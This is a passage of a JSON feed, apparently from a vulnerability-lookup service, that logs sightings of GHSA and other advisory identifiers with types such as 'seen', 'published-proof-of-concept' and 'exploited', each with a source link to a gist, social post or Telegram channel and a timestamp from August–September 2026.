"18caa615-d2f4-47d2-873f-c22e14f9ac6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2mw5-23gm-pccq", "type": "seen", "source": "https://gist.github.com/alon710/b029bbe534cb811529fb1bfee50ed025", "content": "", "creation_timestamp": "2026-09-03T00:32:06.659354Z"}, {"uuid": "0e6c037d-20d0-4c90-85db-c4fb33b48b73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RCR6-4JQH-J84M", "type": "published-proof-of-concept", "source": "https://t.me/HackingTeamGrupoOfficial/48243", "content": "", "creation_timestamp": "2026-09-03T00:00:52.787743Z"}, {"uuid": "5e29c231-261f-42b4-a5be-8bf497d39043", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C3F5-4G7F-QJQJ", "type": "published-proof-of-concept", "source": "https://t.me/HackingTeamGrupoOfficial/47087", "content": "", "creation_timestamp": "2026-09-03T00:00:51.871858Z"}, {"uuid": "59b0d74a-ecb0-4c22-927f-bacc2e207fd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r3j6-gpjw-qfjr", "type": "seen", "source": "https://gist.github.com/alon710/f0327fbec515b265e501091e4bb41d35", "content": "", "creation_timestamp": "2026-09-02T00:32:16.928969Z"}, {"uuid": "8062768a-2e4e-4c5d-83ac-0aa0327cc604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vx62-cvr5-x3p4", "type": "seen", "source": "https://bsky.app/profile/glitterbean.wehavecookies.social.ap.brid.gy/post/3muiixdyp63p2", "content": "", "creation_timestamp": "2026-09-01T22:49:21.168213Z"}, {"uuid": "0535f398-a6b7-4321-9459-c4663f42330c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vp52-pcj8-j9qc", "type": "seen", "source": "https://gist.github.com/alon710/422f915c96f67cc1c9fceb7d3c2778a9", "content": "", "creation_timestamp": "2026-09-01T22:31:39.074603Z"}, {"uuid": "43bc72ce-b1c8-4cb1-a6e7-18ef0670376f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vp52-pcj8-j9qc", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3muih6h3exb2o", "content": "", "creation_timestamp": "2026-09-01T22:17:30.858981Z"}, {"uuid": "d95e438e-ae08-4b2e-83b1-e10413ca9402", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m4rf-3fr8-xwx3", "type": "seen", "source": "https://gist.github.com/alon710/d77c44365a5d967f73ae86db10f23480", "content": "", "creation_timestamp": "2026-09-01T21:31:43.289237Z"}, {"uuid": "013a79f1-bcc8-44eb-aed8-879af8915cb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2m8g-3cmr-wg3w", "type": "seen", "source": "https://gist.github.com/alon710/25c48d25038e76519874ccf73ad1c753", "content": "", "creation_timestamp": "2026-09-01T20:33:07.814116Z"}, {"uuid": "ae156ade-8473-49c1-9026-e4705f0400bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2RX9-3G3H-C2JV", "type": "seen", "source": "https://gist.github.com/alon710/a2faaa6c3e9fca4817597ff64b25df31", "content": "", "creation_timestamp": "2026-09-01T20:22:11.263856Z"}, {"uuid": "1c15e205-0d95-43f5-a3fa-88bfd84e2304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P44J-XRQG-4XRR", "type": "seen", "source": "https://t.me/hacking_Attack/11108", "content": "", "creation_timestamp": "2026-09-01T20:02:40.121781Z"}, {"uuid": "9f089565-a035-4217-8e4c-4f2d3040bfc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V8P8-4W8F-QH34", "type": "seen", "source": "https://t.me/hacking_Attack/14865", "content": "", "creation_timestamp": "2026-09-01T20:02:34.528626Z"}, {"uuid": "6c8cbeb9-734f-4b44-b4e3-270ec12f4a33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-93XJ-8MRV-444M", "type": "seen", "source": "https://t.me/hacking_Attack/17172", "content": "", "creation_timestamp": "2026-09-01T20:02:31.234483Z"}, {"uuid": "92ed3b4a-0f21-4a15-87c2-372553470fdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HQ37-853P-G5CF", "type": "seen", "source": "https://t.me/hacking_Attack/17172", "content": "", "creation_timestamp": "2026-09-01T20:02:31.214027Z"}, {"uuid": "99d967f1-fbcd-4ced-a0bd-6c407b45c30a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CMCX-XHR8-3W9P", "type": "seen", "source": "https://t.me/hacking_Attack/17172", "content": "", "creation_timestamp": "2026-09-01T20:02:31.191372Z"}, {"uuid": "aeb6659e-16f3-405a-8df5-86a6e295e0ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-PCQQ-5962-HVCW", "type": "seen", "source": "https://t.me/hacking_Attack/17172", "content": "", "creation_timestamp": "2026-09-01T20:02:31.016385Z"}, {"uuid": "918cd6c6-5cd6-4a31-b660-ccc3a7debb6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M87F-9FVV-2MGG", "type": "seen", "source": "https://t.me/hacking_Attack/23700", "content": "", "creation_timestamp": "2026-09-01T20:02:24.401753Z"}, {"uuid": "f6ed33c4-4f3d-436f-903f-cd09726bc2a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XFVV-GGVQ-PCHH", "type": "seen", "source": "https://t.me/hacking_Attack/184244", "content": "", "creation_timestamp": "2026-09-01T20:00:11.446204Z"}, {"uuid": "56d711f3-7f55-492e-9a67-0f3865d9964b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VVXF-F8Q9-86GH", "type": "seen", "source": "https://t.me/hacking_Attack/184244", "content": "", "creation_timestamp": "2026-09-01T20:00:11.427837Z"}, {"uuid": "11de3722-08ab-40f3-a48d-7f9bdb5bfaa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HJR6-G723-HMFM", "type": "seen", "source": "https://t.me/hacking_Attack/189047", "content": "", "creation_timestamp": "2026-09-01T20:00:06.790391Z"}, {"uuid": "cc23f565-23b0-4e47-9713-9fb0f0c6039e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-575V-8HFQ-M3MC", "type": "seen", "source": "https://t.me/hacking_Attack/189047", "content": "", "creation_timestamp": "2026-09-01T20:00:06.765605Z"}, {"uuid": "803f35df-f213-408c-9843-12b859765574", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9969-8G9H-RXWM", "type": "seen", "source": "https://t.me/hacking_Attack/189047", "content": "", "creation_timestamp": "2026-09-01T20:00:06.743405Z"}, {"uuid": "8d405898-3371-4144-a6ba-0f2bb1a0e381", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MFX4-HV73-Q22V", "type": "seen", "source": "https://t.me/hacking_Attack/190197", "content": "", "creation_timestamp": "2026-09-01T20:00:06.240604Z"}, {"uuid": "d36bfe61-7bd0-4202-8e41-3ccad3afe056", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gqvg-gmmx-x4hm", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mui2hc6ac22j", "content": "", "creation_timestamp": "2026-09-01T18:29:49.054332Z"}, {"uuid": "d7b1fd17-5db7-4c24-80bf-fd1bdb710a3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gqvg-gmmx-x4hm", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mui2hbc2xl2k", "content": "", "creation_timestamp": "2026-09-01T18:29:48.422067Z"}, {"uuid": "6f273a13-3e20-4101-b05e-cefd2ee9bc82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-H637-C88J-47WQ", "type": "seen", "source": "https://t.me/cissp/1946", "content": "", "creation_timestamp": "2026-09-01T17:01:09.239149Z"}, {"uuid": "efe9708e-838e-4e21-bb6c-ed4e38f79b31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CCX2-W2R4-X649", "type": "seen", "source": "https://t.me/cissp/1946", "content": "", "creation_timestamp": "2026-09-01T17:01:09.220246Z"}, {"uuid": "bb9559b2-6009-4f70-affa-beee801e4cce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7MH3-GQ28-GFRQ", "type": "seen", "source": "https://t.me/cissp/1946", "content": "", "creation_timestamp": "2026-09-01T17:01:09.198938Z"}, {"uuid": "a9fa9b8c-1a2e-4022-9c7c-62e2deaff0ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CISCO-SA-20180328-QOS", "type": "seen", "source": "https://t.me/cissp/3513", "content": "", "creation_timestamp": "2026-09-01T17:00:47.648878Z"}, {"uuid": "a8fed959-85cc-4e4b-a182-e8467a6b2cd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7GHQ-V6JF-G56C", "type": "seen", "source": "Telegram/LlmxGe0NepodwSEOY074WWsyLFKwhuGisAtYyUzoGwpzcWQ", "content": "", "creation_timestamp": "2026-09-01T04:00:04.765218Z"}, {"uuid": "4b16141d-897c-4b16-8106-0338d8898c0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jcj7-v34w-v9vv", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mug6mqu4b324", "content": "", "creation_timestamp": "2026-09-01T00:39:07.647603Z"}, {"uuid": "ca02bdc0-6444-4a9f-9a37-cb86aa5560b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8x3q-jpjh-qh5c", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mufsvompub2y", "content": "", "creation_timestamp": "2026-08-31T21:09:22.443423Z"}, {"uuid": "33b1f95c-9726-4fc9-8af7-09cbb4cdd5c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r28c-9q8g-f849", "type": "seen", "source": "https://gist.github.com/djlan/fbbd67ae540e75a05a0ea40660370ca8", "content": "", "creation_timestamp": "2026-08-31T16:10:23.821918Z"}, {"uuid": "9dcd2b4a-ea7a-4b68-b682-ba759855bb7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-037", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/117190223433462408", "content": "", "creation_timestamp": "2026-08-31T12:55:06.585583Z"}, {"uuid": "c8b44ab1-a9f4-4241-95de-562545ee416f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-037", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3muexbpjh2b2r", "content": "", "creation_timestamp": "2026-08-31T12:55:00.968695Z"}, {"uuid": "715db994-a951-4714-a401-36b422be5547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-42r5-vhpq-m858", "type": "seen", "source": "https://gist.github.com/alon710/5f232ba94d0a0fcc67abaad39f7d78cc", "content": "", "creation_timestamp": "2026-08-29T16:31:36.569297Z"}, {"uuid": "502b5154-ea88-44ad-a6ee-f557411357d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7g4w-cg88-2cq2", "type": "seen", "source": "https://infosec.exchange/users/AAKL/statuses/117179605144571410", "content": "", "creation_timestamp": "2026-08-29T15:54:38.057249Z"}, {"uuid": "af104a10-5498-49c6-88c9-b6fc0f44b1f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mrpp-v6pg-p54x", "type": "seen", "source": "https://gist.github.com/alon710/a4189f000966d11dd547e0bc128cf503", "content": "", "creation_timestamp": "2026-08-29T15:32:25.745682Z"}, {"uuid": "b740357f-6bf8-4258-8fc1-28895fe615dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gqr6-r77p-c2pj", "type": "seen", "source": "https://gist.github.com/alon710/ebe5dde178b6da3fe2981f7349adc91f", "content": "", "creation_timestamp": "2026-08-29T14:31:35.231016Z"}, {"uuid": "e834d11d-bf5a-4759-8632-cdaca9d96311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j769-9gv9-65gr", "type": "seen", "source": "https://gist.github.com/alon710/4cae326e01f80455b82df9da7e1b2023", "content": "", "creation_timestamp": "2026-08-29T13:31:53.491484Z"}, {"uuid": "75fdd7be-dc0f-4934-9361-0694da82418a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7g4w-cg88-2cq2", "type": "seen", "source": "https://bsky.app/profile/newssecia.bsky.social/post/3mu7xrryqyf2v", "content": "", "creation_timestamp": "2026-08-29T13:20:41.464032Z"}, {"uuid": "19a0e84a-605b-471f-881f-3cf68e275f04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-56wq-x3wv-3ff4", "type": "seen", "source": "https://gist.github.com/alon710/f39d221628c93e95f65b186b807e9a92", "content": "", "creation_timestamp": "2026-08-29T11:31:50.379437Z"}, {"uuid": "fc2079a1-fd9b-4d42-b1be-695d8b0197ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m4g4-86qc-v8w7", "type": "seen", "source": "https://gist.github.com/alon710/9e3bb6e078cacafc1d284d829bce0078", "content": "", "creation_timestamp": "2026-08-29T10:32:30.904448Z"}, {"uuid": "cce1964f-51a3-4755-9c9c-b39eedc19890", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-334q-h5g3-fpxv", "type": "seen", "source": "https://gist.github.com/alon710/bfdbd4d8edcf6cd0b3abcf06b55c6e3d", "content": "", "creation_timestamp": "2026-08-29T09:32:16.488418Z"}, {"uuid": "915d143c-c04c-48ca-a5d0-d8a84a092476", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fp46-6vfw-gc9c", "type": "seen", "source": "https://gist.github.com/alon710/80c417396f60f7c70df3dd3bd23d2e87", "content": "", "creation_timestamp": "2026-08-29T08:31:54.824049Z"}, {"uuid": "721c206f-096d-4012-8f8e-e58c202ee0fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7G4W-CG88-2CQ2", "type": "exploited", "source": "Telegram/CzREW4zYQrdpDU3f06_fKc9y00y9UGbjYDqP2BwY_P4brA", "content": "", "creation_timestamp": "2026-08-29T08:00:05.110364Z"}, {"uuid": "5a52fe0a-0c54-4d2a-a250-27c6ee6ab698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5v29-34h8-v68r", "type": "seen", "source": "https://gist.github.com/alon710/fd6e1d0021286f338be43882b18358f9", "content": "", "creation_timestamp": "2026-08-29T07:31:59.101589Z"}, {"uuid": "8f608e6c-6d48-479a-9cf6-3821bea2db95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j5g3-42wp-gqm3", "type": "seen", "source": "https://gist.github.com/alon710/bca69671d982aa5325684eebc9b91ff4", "content": "", "creation_timestamp": "2026-08-29T06:33:12.624149Z"}, {"uuid": "717ee5ed-61ea-4730-a3a7-23f1f5f19e82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g9jj-cgmh-9f38", "type": "seen", "source": "https://gist.github.com/alon710/b4396cc6c765460048e24f2b654c8aa9", "content": "", "creation_timestamp": "2026-08-29T05:32:06.134721Z"}, {"uuid": "88995351-7b95-42ed-87cd-ae50fe165c38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qxvw-fvwx-5cp7", "type": "seen", "source": "https://gist.github.com/alon710/3380ae01f52344248b245161333046b0", "content": "", "creation_timestamp": "2026-08-29T04:33:12.796794Z"}, {"uuid": "db8b38e1-bd82-4d7b-8fa9-a03a96bfaa72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xvr9-35cr-46v9", "type": "seen", "source": "https://gist.github.com/alon710/8d1aa47ee5a874bddf01dd7e56e42801", "content": "", "creation_timestamp": "2026-08-29T03:32:22.973883Z"}, {"uuid": "70408709-f422-41bc-9f64-759021bbd811", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rqc-86vf-g8r2", "type": "seen", "source": "https://gist.github.com/alon710/dd09c3ef696a75a72346fac91d4e54bd", "content": "", "creation_timestamp": "2026-08-29T02:32:11.101797Z"}, {"uuid": "5d3d0572-952a-4109-b63b-db4d97c51bb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c857-9x2m-cvh2", "type": "seen", "source": "https://gist.github.com/alon710/607da531ae276a39a8c057ba4505abda", "content": "", "creation_timestamp": "2026-08-29T01:40:29.199786Z"}, {"uuid": "8cdaf8ff-9e59-4a31-9990-d0840c9b16cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j5g3-42wp-gqm3", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mu6pxqzov725", "content": "", "creation_timestamp": "2026-08-29T01:28:40.665113Z"}, {"uuid": "49ebfa2a-2474-46be-a1bb-a28aa95ce58c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-66H4-QJ4X-38XP", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityExploit/16968", "content": "", "creation_timestamp": "2026-08-29T00:00:32.128613Z"}, {"uuid": "13b76460-7531-4896-8be0-8f22b16cc969", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-F558-MP87-58VJ", "type": "published-proof-of-concept", "source": "https://t.me/cve0day/270", "content": "", "creation_timestamp": "2026-08-29T00:00:30.293714Z"}, {"uuid": "9b165437-92c3-4dba-8105-5d0482291bb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v649-94v2-p72q", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mtzquzxjvb23", "content": "", "creation_timestamp": "2026-08-27T02:01:16.108502Z"}, {"uuid": "b4412c7a-3f2d-479f-b925-4daa977394fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-57h7-vw2f-2f9x", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mtzquzxjvb23", "content": "", "creation_timestamp": "2026-08-27T02:01:16.080143Z"}, {"uuid": "736fee26-d72d-41bc-898f-a89caed8cb47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hg4r-vv53-vwf8", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mtzquzxjvb23", "content": "", "creation_timestamp": "2026-08-27T02:01:16.051918Z"}, {"uuid": "0a440700-17c1-4946-ad34-8f6f7c185365", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2vf2-grvj-6g8x", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mtzquyvy3p2n", "content": "", "creation_timestamp": "2026-08-27T02:01:15.433608Z"}, {"uuid": "804a4ba0-9493-4656-babf-6ee42504cbab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4464-r7qj-pgrx", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mtzquyvy3p2n", "content": "", "creation_timestamp": "2026-08-27T02:01:15.411649Z"}, {"uuid": "14d3335e-4114-4db1-bf67-4ae30180cdbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ffjr-p229-hpch", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mtzquyvy3p2n", "content": "", "creation_timestamp": "2026-08-27T02:01:15.386289Z"}, {"uuid": "8e8bdc3e-7555-4b19-b9d6-e651c2c60a40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r9pv-ffph-6gg6", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mtzquxuj6y2y", "content": "", "creation_timestamp": "2026-08-27T02:01:14.542028Z"}, {"uuid": "d4ef8573-9b30-478f-b877-605b618a4bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m85m-3qxv-63h5", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mtzquxuj6y2y", "content": "", "creation_timestamp": "2026-08-27T02:01:14.501590Z"}, {"uuid": "f79ffe97-2aa8-4a4e-8347-a9526fd8e332", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h5w2-q35j-443h", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mtzquxuj6y2y", "content": "", "creation_timestamp": "2026-08-27T02:01:14.451031Z"}, {"uuid": "29c76964-5546-4994-80b7-3fb79396de0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-P293-QW3H-JR36", "type": "published-proof-of-concept", "source": "Telegram/5OcvQ0Kvc7EZmNnx124YGJsJb961fNxRCYGvYNIkiajBUhEy", "content": "", "creation_timestamp": "2026-08-27T00:00:07.185722Z"}, {"uuid": "2af980b1-8073-42ac-8bbf-48cd132c88f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2XP9-VWFH-VXW4", "type": "published-proof-of-concept", "source": "Telegram/5OcvQ0Kvc7EZmNnx124YGJsJb961fNxRCYGvYNIkiajBUhEy", "content": "", "creation_timestamp": "2026-08-27T00:00:07.112594Z"}, {"uuid": "221bc933-17ed-491b-ab11-d6dd1480e0b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-663M-7X7M-G4FW", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/99834", "content": "", "creation_timestamp": "2026-08-26T23:00:04.206328Z"}, {"uuid": "c2ac2e4a-3646-4393-b6b0-0a6c38480338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7w8c-qgxg-m7jx", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mtz4mdrmhl2x", "content": "", "creation_timestamp": "2026-08-26T19:58:29.929023Z"}, {"uuid": "1e8dd662-b42c-4130-9275-d2cc93bfdf20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7w8c-qgxg-m7jx", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mtz4mcupcb27", "content": "", "creation_timestamp": "2026-08-26T19:58:29.294274Z"}, {"uuid": "d51a637b-99d5-40a6-9719-d10b515c0be5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-G2Q5-5433-RHRF", "type": "seen", "source": "https://t.me/v1_links/308", "content": "", "creation_timestamp": "2026-08-26T18:00:05.121380Z"}, {"uuid": "cf0ffe7e-c6ac-4626-bded-090a42347910", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 